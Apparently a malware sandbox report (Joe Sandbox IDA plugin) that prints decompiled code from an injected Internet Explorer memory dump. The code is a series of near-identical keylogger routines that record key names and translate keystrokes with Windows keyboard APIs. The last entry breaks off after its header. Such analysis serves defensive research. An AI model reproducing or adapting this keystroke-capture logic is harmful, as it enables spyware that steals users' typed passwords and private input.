Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85CF1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CF1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Stop]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Stop], xrefs: 00C85CF3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A6B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A6B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Delete]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Delete], xrefs: 00C85A6D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85BE1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BE1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F5]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F5], xrefs: 00C85BE3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C69, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C69(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mail]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Mail], xrefs: 00C85C6B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85AF3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AF3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F14]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F14], xrefs: 00C85AF5
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C8B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C8B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Left Ctrl], xrefs: 00C85C8D

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C859E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

